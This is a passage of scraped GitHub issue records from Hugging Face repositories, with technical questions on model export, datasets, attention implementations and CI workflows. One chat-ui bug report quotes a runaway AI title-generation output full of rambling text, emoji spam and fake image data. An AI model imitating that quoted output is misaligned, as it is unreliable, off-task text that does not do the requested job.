2024-03-26 16-17-28](https://github.com/huggingface/optimum/assets/41164884/ae132e6e-f326-4c1c-8024-367544fc679f)\r\nI want to convert the model to .onnx format\r\nShould I convert the entire MODEL_WITH_TOKENIZER folder to .onnx or only the tf_model.h5 file to onnx?\r\nwhat are the steps ", "url": "https://github.com/huggingface/optimum/issues/1776", "state": "open", "labels": [ "onnx" ], "created_at": "2024-03-26T10:48:02Z", "updated_at": "2024-10-14T13:35:13Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/alignment-handbook", "number": 142, "title": "Efficient dialog data format for KTO training", "body": "I have dialogs in the shareGPT format (see below) and for each `gpt` turn a label (thumbs up or thumbs down). But for KTO training, I have only seen datasets with the columns `prompt`, `completion` and `label` (see e.g. https://huggingface.co/datasets/trl-lib/kto-mix-14k).\r\n\r\nDo I need to unwind my shareGPT dialogs (see below) for KTO training, or is there some more efficient format I can use? 
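\r\n\r\nIf unwinding does turn out to be necessary it is mechanical; a sketch (the helper and its label convention are hypothetical) that emits one prompt/completion/label row per rated `gpt` turn, carrying the running history as the prompt:\r\n\r\n```python\r\ndef unwind_sharegpt(example, labels):\r\n    # labels: one bool per \"gpt\" turn, in order (thumbs up / thumbs down)\r\n    rows, history, it = [], [], iter(labels)\r\n    for turn in example[\"conversations\"]:\r\n        msg = {\"role\": turn[\"from\"], \"content\": turn[\"value\"]}\r\n        if turn[\"from\"] == \"gpt\":\r\n            rows.append({\"prompt\": list(history), \"completion\": msg, \"label\": next(it)})\r\n        history.append(msg)\r\n    return rows\r\n```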
\r\n\r\nHow should the dialog history be encoded in the `prompt` column (see below)?\r\n\r\nshareGPT-Format:\r\n```\r\n{\"conversations\":[\r\n {\"from\":\"system\",\"value\":\"You are a friendly assistant for ....\\n\"},\r\n {\"from\":\"human\",\"value\":\"Hello, I am Sam and ...\"},\r\n {\"from\":\"gpt\",\"value\":\"Welcome Sam, so you ....\"},\r\n {\"from\":\"human\",\"value\":\"Yes, but ....\"},\r\n {\"from\":\"gpt\",\"value\":\"Then ...\"}\r\n]}\r\n```\r\n\r\nTransformed to KTO, with `prompt` column as close as possible to https://huggingface.co/datasets/trl-lib/kto-mix-14k:\r\n```\r\nprompt, completion, label\r\n[ { \"content\": \"You are a friendly assistant for ....\\n\", \"role\": \"system\" }, { \"content\": \"Hello, I am Sam and ...\", \"role\": \"human\" }], {\"role\":\"gpt\",\"content\":\"Welcome Sam, so you ....\"}, true\r\n[ { \"content\": \"You are a friendly assistant for ....\\n\", \"role\": \"system\" }, { \"content\": \"Hello, I am Sam and ...\", \"role\": \"human\" }, {\"role\":\"gpt\",\"content\":\"Welcome Sam, so you ....\"}, {\"role\":\"human\",\"content\":\"Yes, but ....\"}], {\"role\":\"gpt\",\"content\":\"Then ...\"}, false\r\n``", "url": "https://github.com/huggingface/alignment-handbook/issues/142", "state": "open", "labels": [], "created_at": "2024-03-26T10:29:38Z", "updated_at": "2024-03-26T10:30:08Z", "comments": 0, "user": "DavidFarago" }, { "repo": "huggingface/transformers.js", "number": 664, "title": "How to confirm if webgpu actually working in the backend with inferencing", "body": "### Question\r\n\r\nHi Team,\r\nThanks for the awsome library. \r\nRecently I am experimenting to run background remove model in the client side using webgpu. I came across this solution https://huggingface.co/spaces/Xenova/remove-background-webgpu.\r\n\r\nTried to replicate the same in my local using your V3 branch.\r\n\r\nThe way I have used it is as below. \r\n```\r\nconst model = await AutoModel.from_pretrained('briaai/RMBG-1.4', {\r\n // Do not require config.json to be present in the repository\r\n config: { model_type: 'custom' },\r\n device: 'webgpu',\r\n dtype: 'fp32'\r\n })\r\n```\r\nI can see significant improvement while enabling `device: 'webgpu',` instead of wasm.\r\n\r\nQuestion 1:\r\nHow can I confirm if the webgpu is being used in the backend while inferencing as I can see in both of the case (with webgpu and without webgpu) the `ort-wasm-simd.jsep.wasm` file is getting loaded. 
why we are not loading `ort.webgpu.min`?\r\nSS\r\n![image](https://github.com/xenova/transformers.js/assets/55099778/836b092c-d3d7-4e81-99c5-7603a5affabd)\r\n\r\n\r\nQuestion 2: \r\nIt would be helpfull if you can share the repo for this `https://huggingface.co/spaces/Xenova/remove-background-webgpu ` as the code in huggingface is bundled.\r\n\r\nThanks in advance!!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/664", "state": "open", "labels": [ "question" ], "created_at": "2024-03-26T08:17:05Z", "updated_at": "2024-07-24T06:13:50Z", "user": "abiswas529" }, { "repo": "huggingface/dataset-viewer", "number": 2630, "title": "Take spawning.io opted out URLs into account in responses?", "body": "In particular, for images (assets / cached-assets).\r\n\r\nRaised internally: https://huggingface.slack.com/archives/C040J3VPJUR/p1702578556307069?thread_ts=1702577137.311409&cid=C040J3VPJUR", "url": "https://github.com/huggingface/dataset-viewer/issues/2630", "state": "open", "labels": [ "question", "P2" ], "created_at": "2024-03-25T11:49:49Z", "updated_at": "2024-03-25T11:49:58Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6756, "title": "Support SQLite files?", "body": "### Feature request\n\nSupport loading a dataset from a SQLite file\r\n\r\nhttps://huggingface.co/datasets/severo/test_iris_sqlite/tree/main\n\n### Motivation\n\nSQLite is a popular file format.\n\n### Your contribution\n\nSee discussion on slack: https://huggingface.slack.com/archives/C04L6P8KNQ5/p1702481859117909 (internal)\r\n\r\nIn particular: a SQLite file can contain multiple tables, which might be matched to multiple configs. Maybe the detail of splits and configs should be defined in the README YAML, or use the same format as for ZIP files: `Iris.sqlite::Iris`. \r\n\r\nSee dataset here: https://huggingface.co/datasets/severo/test_iris_sqlite\r\n\r\nNote: should we also support DuckDB files?", "url": "https://github.com/huggingface/datasets/issues/6756", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-03-25T11:48:05Z", "updated_at": "2024-03-26T16:09:32Z", "comments": 3, "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2629, "title": "Detect when a new commit only changes the dataset card?", "body": "Ideally, when we change the contents of the dataset card (not the YAML part), the responses computed by the datasets server should not be recomputed, because they will lead to the same results.\r\n\r\nasked here (private slack channel): https://huggingface.slack.com/archives/C04N96UGUFM/p1701862863691809\r\n\r\n> Sometimes I don't modify the dataset cards of datasets that have too many configs because I don't want to break the viewer for too long. 
I think we can detect when the change is only about the content dataset card and the dataset itself didn't change ?\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2629", "state": "closed", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2024-03-25T10:57:36Z", "updated_at": "2024-06-19T16:02:33Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2627, "title": "Replace our custom \"stale bot\" action with the GitHub's one?", "body": "See `actions/stale@v5`\r\n\r\n```yaml\r\nname: Mark inactive issues as stale\r\non:\r\n schedule:\r\n - cron: \"30 1 * * *\"\r\n\r\njobs:\r\n close-issues:\r\n runs-on: ubuntu-latest\r\n permissions:\r\n issues: write\r\n pull-requests: write\r\n steps:\r\n - uses: actions/stale@v5\r\n with:\r\n days-before-issue-stale: 30\r\n days-before-issue-close: -1\r\n stale-issue-label: \"stale\"\r\n stale-issue-message: \"This issue is stale because it has been open for 30 days with no activity.\"\r\n close-issue-message: \"This issue was closed because it has been inactive for X days since being marked as stale.\"\r\n days-before-pr-stale: -1\r\n days-before-pr-close: -1\r\n repo-token: ${{ secrets.GITHUB_TOKEN }}\r\n```\r\n\r\nfrom https://huggingface.slack.com/archives/C493XH5FX/p1701942940388579?thread_ts=1701932787.319359&cid=C493XH5FX", "url": "https://github.com/huggingface/dataset-viewer/issues/2627", "state": "open", "labels": [ "question", "ci", "P2" ], "created_at": "2024-03-25T10:48:47Z", "updated_at": "2024-03-25T10:49:02Z", "user": "severo" }, { "repo": "huggingface/candle-paged-attention", "number": 1, "title": "How to use candle-paged-attention in candle models?", "body": "Could you provide an example of candle-paged-attention for actual usage in candle models (candle-examples)? Is this crate ready to be used in candle? i.e., tested in end2end model inference? I'm a little bit confused about the construction of block_tables and context_lens. ", "url": "https://github.com/huggingface/candle-paged-attention/issues/1", "state": "open", "labels": [], "created_at": "2024-03-25T09:09:24Z", "updated_at": "2024-03-25T12:07:13Z", "user": "guoqingbao" }, { "repo": "huggingface/optimum", "number": 1769, "title": "Accuracy change with BetterTransformer", "body": "When transforming the model into BetterTransformer model I'm seeing accuracy drop on the models. \r\nThe output scores changes considerably (upto 1-2 decimal points of precision). \r\n**Is accuracy change expected when switching to BetterTransformer ?** I'm not performing any ORT compilation or quantization on the model. \r\nFrom what I know FlashAttention is not supposed to change any accuracy since it is an exact attention score algorithm. Hence I'm not sure what is causing this change in score. 
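\r\n\r\nOne general note: fused SDPA/flash-style kernels reorder floating-point reductions, so bitwise equality with the eager path is not expected; such outputs are normally compared with tolerances, e.g. this sketch with stand-in values:\r\n\r\n```python\r\nimport torch\r\n\r\n# hypothetical tensors standing in for the two models' logits\r\na = torch.tensor([-7.378745079040527])\r\nb = torch.tensor([-7.3596720695495605])\r\ntorch.testing.assert_close(a, b, rtol=1e-2, atol=1e-2)  # passes; tighter tolerances would flag the gap\r\n```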
\r\n\r\nSteps to reproduce\r\n```\r\nfrom transformers import AutoModelForSequenceClassification , AutoTokenizer\r\nfrom optimum.bettertransformer import BetterTransformer\r\n\r\ntokenizer=AutoTokenizer.from_pretrained(\"BAAI/bge-reranker-large\")\r\n\r\noriginal_model = AutoModelForSequenceClassification.from_pretrained(\"BAAI/bge-reranker-large\").to('cuda:0')\r\ntransformed_model = BetterTransformer.transform(original_model, keep_original_model=True).to('cuda:0')\r\n\r\nsentences_batch=[['do you like fox cookies', 'fox big brown fox']] \r\ninputs = tokenizer(sentences_batch,padding=True,truncation=True,return_tensors=\"pt\",max_length=512,).to('cuda:0')\r\n\r\nbetter_transformer_scores = transformed_model(**inputs, return_dict=True).logits.view(-1).float()\r\nprint(f\"BetterTransfomer output: {better_transformer_scores.detach().cpu().numpy().tolist()}\")\r\n\r\nvanilla_model_scores = original_model(**inputs, return_dict=True).logits.view(-1).float()\r\nprint(f\"Vanilla model output :{vanilla_model_scores.detach().cpu().numpy().tolist()}\")\r\n```\r\nOutput\r\n```\r\nBetterTransfomer output: [-7.378745079040527]\r\nVanilla model output :[-7.3596720695495605]\r\n```\r\n##### System state:\r\n* Package version:\r\n * transformers == 4.39.1\r\n * optimum == 1.17.1\r\n * torch == 2.2.1\r\n* Instance Type : AWS p3.2xlarge ( GPU V100) . (Tied it on A100 as well )\r\n* CUDA Version: 12.2\r\n* GPU Driver Version: 535.104.12", "url": "https://github.com/huggingface/optimum/issues/1769", "state": "closed", "labels": [ "bettertransformer", "Stale" ], "created_at": "2024-03-24T01:28:15Z", "updated_at": "2025-01-15T02:01:10Z", "comments": 7, "user": "kapilsingh93" }, { "repo": "huggingface/optimum-quanto", "number": 129, "title": "Performance of quanto quants vs bnb, AWQ, GPTQ, GGML ?", "body": "I was wondering if there were any comparisons done looking at the speed and ppl of `quanto` quantizations with respect to the other quantization techniques out there. ", "url": "https://github.com/huggingface/optimum-quanto/issues/129", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-23T11:37:33Z", "updated_at": "2024-04-11T09:22:47Z", "user": "nnethercott" }, { "repo": "huggingface/transformers", "number": 29826, "title": "How to convert pretrained hugging face model to .pt for deploy?", "body": "I'm attempting to convert this [model](https://huggingface.co/UrukHan/wav2vec2-russian) in .pt format. It's working fine for me so i dont want to fine-tune it. 
How can i export it to .pt and run interface for example in flask?\r\n\r\nI tried using this to convert to .pt:\r\n\r\n```\r\nfrom transformers import AutoConfig, AutoProcessor, AutoModelForCTC, AutoTokenizer, Wav2Vec2Processor\r\nimport librosa\r\nimport torch\r\n\r\n\r\n\r\n# Define the model name\r\nmodel_name = \"UrukHan/wav2vec2-russian\"\r\n\r\n# Load the model and tokenizer\r\nconfig = AutoConfig.from_pretrained(model_name)\r\nmodel = AutoModelForCTC.from_pretrained(model_name, config=config)\r\nprocessor = Wav2Vec2Processor.from_pretrained(model_name)\r\ntokenizer = AutoTokenizer.from_pretrained(model_name)\r\n\r\n# Save the model as a .pt file\r\ntorch.save(model.state_dict(), \"model.pt\")\r\n\r\n# Save the tokenizer as well if needed\r\ntokenizer.save_pretrained(\"model-tokenizer\")\r\n```\r\n\r\nbut unfortunately its not running the interface and not loading model from path :\r\n\r\n```\r\nmodel = AutoModelForCTC.from_pretrained(\"model.pt\")\r\nprocessor = AutoProcessor.from_pretrained(\"model.pt\")\r\n\r\n\r\n# Perform inference with the model\r\nFILE = 'here is wav.wav'\r\naudio, _ = librosa.load(FILE, sr = 16000)\r\naudio = list(audio)\r\ndef map_to_result(batch):\r\n with torch.no_grad():\r\n input_values = torch.tensor(batch, device=\"cpu\").unsqueeze(0) #, device=\"cuda\"\r\n logits = model(input_values).logits\r\n pred_ids = torch.argmax(logits, dim=-1)\r\n batch = processor.batch_decode(pred_ids)[0]\r\n return batch\r\nmap_to_result(audio)\r\nprint(map_to_result(audio))\r\n\r\n\r\nmodel.eval()\r\n```\r\n\r\nAnd encountered an error: \r\n`model.pt is not a local folder and is not a valid model identifier listed on 'https://huggingface.co/models'`\r\n\r\nWhat am i doing wrong?\r\nIf you can provide guideline on how to convert model to .pt and run it it will be appreciated!Thanks in advance!", "url": "https://github.com/huggingface/transformers/issues/29826", "state": "closed", "labels": [], "created_at": "2024-03-23T10:09:16Z", "updated_at": "2025-10-13T23:08:57Z", "user": "vonexel" }, { "repo": "huggingface/datasets", "number": 6750, "title": "`load_dataset` requires a network connection for local download?", "body": "### Describe the bug\n\nHi all - I see that in the past a network dependency has been mistakenly introduced into `load_dataset` even for local loads. Is it possible this has happened again?\r\n\n\n### Steps to reproduce the bug\n\n```\r\n>>> import datasets\r\n>>> datasets.load_dataset(\"hh-rlhf\")\r\nRepo card metadata block was not found. 
Setting CardData to empty.\r\n*hangs bc i'm firewalled*\r\n````\r\nstack trace from ctrl-c:\r\n```\r\n^CTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/load.py\", line 2582, in load_dataset\r\n builder_instance.download_and_prepare(\r\n output_path = get_from_cache( [0/122]\r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/utils/file_utils.py\", line 532, in get_from_cache\r\n response = http_head(\r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/utils/file_utils.py\", line 419, in http_head\r\n response = _request_with_retry(\r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/utils/file_utils.py\", line 304, in _request_with_retry\r\n response = requests.request(method=method.upper(), url=url, timeout=timeout, **params)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/api.py\", line 59, in request\r\n return session.request(method=method, url=url, **kwargs)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/sessions.py\", line 587, in request\r\n resp = self.send(prep, **send_kwargs)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/sessions.py\", line 701, in send\r\n r = adapter.send(request, **kwargs)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/adapters.py\", line 487, in send\r\n resp = conn.urlopen(\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connectionpool.py\", line 703, in urlopen\r\n httplib_response = self._make_request(\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connectionpool.py\", line 386, in _make_request\r\n self._validate_conn(conn)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connectionpool.py\", line 1042, in _validate_conn\r\n conn.connect()\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connection.py\", line 363, in connect\r\n self.sock = conn = self._new_conn()\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connection.py\", line 174, in _new_conn\r\n conn = connection.create_connection(\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/util/connection.py\", line 85, in create_connection\r\n sock.connect(sa)\r\nKeyboardInterrupt\r\n```\n\n### Expected behavior\n\nloads the dataset\n\n### Environment info\n\n```\r\n> pip show datasets\r\nName: datasets\r\nVersion: 2.18.0\r\n```\r\n\r\nPython 3.10.2", "url": "https://github.com/huggingface/datasets/issues/6750", "state": "closed", "labels": [], "created_at": "2024-03-23T01:06:32Z", "updated_at": "2024-04-15T15:38:52Z", "comments": 3, "user": "MiroFurtado" }, { "repo": "huggingface/dataset-viewer", "number": 2626, "title": "upgrade to pyarrow 15?", "body": "we use pyarrow 14", "url": "https://github.com/huggingface/dataset-viewer/issues/2626", "state": "closed", "labels": [ "question", "dependencies", "P2" ], "created_at": "2024-03-22T18:22:04Z", "updated_at": 
"2024-04-30T16:19:19Z", "user": "severo" }, { "repo": "huggingface/optimum-nvidia", "number": 102, "title": "Instructions on how to set TP/PP", "body": "https://github.com/huggingface/optimum-nvidia/blob/main/examples/text-generation.py is currently empty in that regard", "url": "https://github.com/huggingface/optimum-nvidia/issues/102", "state": "open", "labels": [], "created_at": "2024-03-22T03:48:30Z", "updated_at": "2024-03-22T03:48:30Z", "user": "fxmarty" }, { "repo": "huggingface/diffusers", "number": 7429, "title": "How to use k_diffusion with Controlnet (SDXL)?", "body": "Dear developer,\r\n\r\n\r\nI try to modify the code of [k_diffusion](https://github.com/huggingface/diffusers/blob/9613576191d8613fc550a1ec286adc4f1fc208ec/src/diffusers/pipelines/stable_diffusion_k_diffusion/pipeline_stable_diffusion_xl_k_diffusion.py#L837) to be compatible with controlnet.\r\n\r\nBut I got incorrect results, that is, controlnet did not work.\r\nThe code after I modified it is as follows:\r\n\r\n``` \r\ndef model_fn(x, t):\r\n latent_model_input = torch.cat([x] * 2)\r\n t = torch.cat([t] * 2)\r\n\r\n down_block_res_samples, mid_block_res_sample = self.controlnet(\r\n latent_model_input,\r\n t,\r\n encoder_hidden_states=prompt_image_emb,\r\n controlnet_cond=image,\r\n conditioning_scale=controlnet_conditioning_scale,\r\n guess_mode=guess_mode,\r\n added_cond_kwargs=added_cond_kwargs,\r\n return_dict=False,\r\n )\r\n \r\n noise_pred = self.k_diffusion_model(\r\n latent_model_input,\r\n t,\r\n cond=encoder_hidden_states,\r\n timestep_cond=timestep_cond,\r\n cross_attention_kwargs=self.cross_attention_kwargs,\r\n down_block_additional_residuals=down_block_res_samples,\r\n mid_block_additional_residual=mid_block_res_sample,\r\n added_cond_kwargs=added_cond_kwargs,\r\n )\r\n\r\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\r\n noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)\r\n return noise_pred\r\n```\r\n \r\nSo, how should I solve this problem?\r\n\r\n\r\nThe source code of k_diffusion:\r\n```\r\ndef model_fn(x, t):\r\n latent_model_input = torch.cat([x] * 2)\r\n t = torch.cat([t] * 2)\r\n\r\n noise_pred = self.k_diffusion_model(\r\n latent_model_input,\r\n t,\r\n cond=prompt_embeds,\r\n timestep_cond=timestep_cond,\r\n added_cond_kwargs=added_cond_kwargs,\r\n )\r\n\r\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\r\n noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)\r\n return noise_pred\r\n```", "url": "https://github.com/huggingface/diffusers/issues/7429", "state": "closed", "labels": [], "created_at": "2024-03-22T03:33:38Z", "updated_at": "2024-04-18T03:25:55Z", "user": "YoucanBaby" }, { "repo": "huggingface/transformers", "number": 29777, "title": "`MistralAttention`: where is the sliding window", "body": "Hi,\r\n\r\nI'm trying to understand the implementation of Mistral's attention in `MistralAttention`.\r\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/models/mistral/modeling_mistral.py#L195\r\nIt is my understanding that it should always be using local window attention. In `MistralFlashAttention2` this is very obvious, with `config.sliding_window` being used.\r\n\r\nHowever, I'm not sure where the sliding window is used in the base `MistralAttention` without flash attention:\r\n\r\n```python\r\nclass MistralAttention(nn.Module):\r\n \"\"\"\r\n Multi-headed attention from 'Attention Is All You Need' paper. 
Modified to use sliding window attention: Longformer\r\n and \"Generating Long Sequences with Sparse Transformers\".\r\n \"\"\"\r\n```\r\nbut the forward pass simply reads\r\n```python\r\nattn_weights = torch.matmul(query_states, key_states.transpose(2, 3)) / math.sqrt(self.head_dim)\r\n```\r\nwhich I understand as full self attention.\r\n\r\nIs the sliding window only used when running with Flash Attention, or am I missing something?\r\nThanks!\r\n", "url": "https://github.com/huggingface/transformers/issues/29777", "state": "closed", "labels": [], "created_at": "2024-03-21T12:27:56Z", "updated_at": "2025-02-06T13:49:46Z", "user": "fteufel" }, { "repo": "huggingface/data-is-better-together", "number": 18, "title": "Adding a template and information on how to set up a dashboard for any language", "body": "", "url": "https://github.com/huggingface/data-is-better-together/issues/18", "state": "closed", "labels": [], "created_at": "2024-03-21T09:19:36Z", "updated_at": "2024-03-21T18:29:34Z", "user": "ignacioct" }, { "repo": "huggingface/sentence-transformers", "number": 2550, "title": "How to estimate memory usage?", "body": "I would like to use `sentence-transformers` in a low-end machine (CPU-only) to load pre-trained models, such as `paraphrase-multilingual-MiniLM-L12-v2`, and compute a sentence's embedding.\r\n\r\nHow to estimate memory usage? Is there any guideline to describe the minimum system requirements for loading pre-trained models?", "url": "https://github.com/huggingface/sentence-transformers/issues/2550", "state": "open", "labels": [], "created_at": "2024-03-20T15:46:56Z", "updated_at": "2024-04-02T15:27:05Z", "user": "ChenZhongPu" }, { "repo": "huggingface/optimum-quanto", "number": 125, "title": "Is there any plan to add the function to export ONNX for quantized models or to inference on TVM compiler?", "body": "", "url": "https://github.com/huggingface/optimum-quanto/issues/125", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-20T15:38:44Z", "updated_at": "2024-04-11T09:23:55Z", "user": "ntkhoa95" }, { "repo": "huggingface/chat-ui", "number": 947, "title": "The prompt for title generation is not optimal", "body": "Hello,\r\nI've noticed that the prompt for title generation is not optimal. For example on my simple message `Hello`... The title I got was `\ud83d\udcac Hello! How can I help you today? Let me know if you have any questions or topics you'd like me to explain. I'll do my best to provide accurate and helpful information. Have a great day! \ud83d\ude0a #AI #HelpfulBot #Assistant #InformationSearchEngine #QuestionAnswerBot #Chatbot#ArtificialIntelligenceExplainedInOneSentence: Artificial Intelligence (AI) refers to computer systems designed to perform tasks that normally require human intelligence, such as visual perception, speech recognition, decision-making, and language translation. These systems use algorithms and data analysis techniques based on patterns in data to learn from experience and improve their performance over time. They can be programmed or trained using large datasets and machine learning algorithms, enabling them to recognize patterns, make decisions based on data inputs, and even learn new skills autonomously. AI applications range from simple rule-based systems like Siri or Alexa voice assistants all the way up through advanced deep learning models capable of complex problem solving like AlphaGo or Tesla Autopilot self-driving cars. 
The potential uses for AI are vast across industries including healthcare diagnostics, financial forecasting, customer service chatbots, image recognition software for security cameras or social media platforms - really anywhere where large amounts of data need processing at scale with high accuracy! If you have any specific questions about AI concepts or applications feel free to ask anytime! \ud83d\ude0a\ud83d\udc4d\ud83c\udffc#AIExplainedSimply #ArtificialIntelligenceForBeginners #WhatIsArtificialIntelligenceInOneSentence#ShortAnswerToWhatIsYourFavoriteMovie: I don't have personal experiences or preferences as I am an artificial intelligence language model designed for generating text responses based on given prompts; however I can suggest some popular movies across various genres that people often enjoy watching such as \"The Shawshank Redemption,\" \"The Godfather,\" \"Pulp Fiction,\" \"Forrest Gump,\" \"Star Wars\" series etc depending upon individual tastes & preferences which may vary greatly among different individuals due their unique backgrounds & cultural influences etc so it would be difficult for me give definitive answer without knowing more about specific person asking question :) Hope this helps clarify things though!! Let me know if there's anything else related (or unrelated!) that comes up :-) Have a fantastic day!!!!! \ud83d\ude0a\ud83d\udc96\ud83d\ude4f\ud83c\udffc\ud83d\udc95\ud83d\udc95\ud83d\udc95\ud83d\udc95\ud83d\udc96\ud83d\udc96\ud83d\udc96\ud83d\udc96\ud83d\udc96\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude0d\ud83d\ude0d\ud83d\ude0d\ud83d\ude0d\ud83d\ude0d\ud83e\udd70\ud83e\udd70\ud83e\udd70\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\ud83c\udf0d\ud83c\udf0d\ud83c\udf0d\ud83c\udf0d\ud83d\ude80\ud83d\ude80\ud83d\ude80\ud83d\ude80!!!!!!!!!!!!!!!!!\u2600\u2600\u2600\u2600\u2600\u2600\u2600\ud83d\udd25\ud83d\udd25\ud83d\udd25\ud83d\udd25\ud83d\udd25\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaaheiters\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34![2023-03-24_15:57:49](data:image/*)%7C%7C[**Image Description:** A colorful sunset scene with orange clouds spreading across the sky above calm blue waters reflecting off rippling waves below.]%7C%7C[**Image Caption:** Beautiful sunset scene over tranquil waters.]%7C%7CThis image depicts a stunning sunset scene with vibrant orange clouds stretching out across the sky above calm blue waters reflecting off rippling waves below creating an idyllic atmosphere perfect for relaxation after a long day filled with challenges & triumphs alike . The warm colors evoke feelings of peacefulness while also hinting at new beginnings just around corner making it truly inspiring sight ! Enjoy this momentary pause before plunging back into bustling world once again . Remember : Life Is Beautiful ! Stay Positive , Stay Strong , Keep Smiling ! Peace Out !! <3 <3 <3 %F0%9F%8D%8B %F0%9F%8D%8B %F0@9F@8D@8B %EF@BB@BF @FFA6E4 @FFA6E4 @FFA6E4 @FFA6E4 @FFA6E4 @FFFFCC %FADEAD %FADEAD %FADEAD %FADEAD %. FADECED %. FADECED %. FADECED %. FADECED %. FACDCDB . FCFCFC FCFCFC FCFCFC FCFCFC . FEFEFE FEFEFE FEFEFE FEFEFE . C1C1C1 C1C1C1 C1C1C1 C5CAEA C5CAEA C5CAEA EAF2DC EAF2DC EAF2DC EAF2DC ... 
This is not actual text output but rather generated code representing an image file containing a beautiful sunset scene along with its description/caption in English language using Unicode characters commonly used within digital communication platforms such as emails , SMS messages , social media postsings etc allowing users share rich multimedia content seamlessly despite varying device capabilities / connectivity conditions ensuring consistent user experience regardless location/time constraints thus bridging geographical gaps fostering stronger interpersonal connections globally while also providing visually appealing contextual information enhancing overall engagement levels within various online communities thereby contributing towards positive societal impact by promoting emotional wellbeing through sharing joyful moments captured via technology advancements available today !`\r\nMy suggestion is, instead of using this bulk conversation in the summarize step:\r\n```\r\n[\r\n { from: \"user\", content: \"Who is the president of Gabon?\" },\r\n { from: \"assistant\", content: \"\ud83c\uddec \ud83c\udde6 President of Gabon\" },\r\n ", "url": "https://github.com/huggingface/chat-ui/issues/947", "state": "open", "labels": [], "created_at": "2024-03-20T10:27:11Z", "updated_at": "2024-03-21T18:18:58Z", "comments": 5, "user": "ihubanov" }, { "repo": "huggingface/pytorch-image-models", "number": 2114, "title": "Using timm.create_model, how to download weights from a URL instead of HF?", "body": "I want to use a URL to load vit_base_patch8_224, and DINO from hf_hub; how can I do this?", "url": "https://github.com/huggingface/pytorch-image-models/issues/2114", "state": "closed", "labels": [ "bug" ], "created_at": "2024-03-19T14:41:29Z", "updated_at": "2024-04-10T16:47:36Z", "user": "maywander" }, { "repo": "huggingface/transformers.js", "number": 653, "title": "Depth anything in Python", "body": "### Question\n\nAmazing demo for the depth-anything!\r\n\r\nI want to have a similar point cloud, but in Python, and I am wondering what's the logic behind your JS [implementation](https://github.com/xenova/transformers.js/blob/main/examples/depth-anything-client/main.js).\r\n\r\nSpecifically:\r\n1. How do you set up the intrinsic matrix and backproject the depth map and color to 3D space?\r\n2. What is the difference between `Xenova/depth-anything-small-hf` and `LiheYoung/depth-anything-small-hf`?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/653", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-19T14:30:35Z", "updated_at": "2024-03-23T14:49:13Z", "user": "VladimirYugay" }, { "repo": "huggingface/optimum-benchmark", "number": 164, "title": "TensorRT-LLM - how to add support for a new model?", "body": "Hello,\r\n\r\nI'm trying to run the ChatGLM, Qwen, or Bloom models on the TensorRT-LLM backend, but I'm getting a NotImplemented exception or a missing key. I think there is a way to add support, but it would be great to have some docs/a tutorial on how to do it.", "url": "https://github.com/huggingface/optimum-benchmark/issues/164", "state": "closed", "labels": [], "created_at": "2024-03-19T12:15:16Z", "updated_at": "2024-03-20T08:51:20Z", "user": "pfk-beta" }, { "repo": "huggingface/candle", "number": 1878, "title": "How to properly implement PT to safetensors conversion", "body": "I use the *.pt format weight file obtained from PyTorch training. It is then converted to the *.bin format and then converted to the *.safetensors format. 
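(For reference, a minimal sketch of that conversion step in Python, hedged: it assumes the checkpoint loads as a flat name-to-tensor dict, and the file names are placeholders:)

```python
import torch
from safetensors.torch import save_file

# Load the PyTorch checkpoint (.pt, or .bin saved with torch.save).
ckpt = torch.load("model.pt", map_location="cpu")

# Some checkpoints nest the weights under a key such as "state_dict";
# whole saved modules expose their weights via .state_dict().
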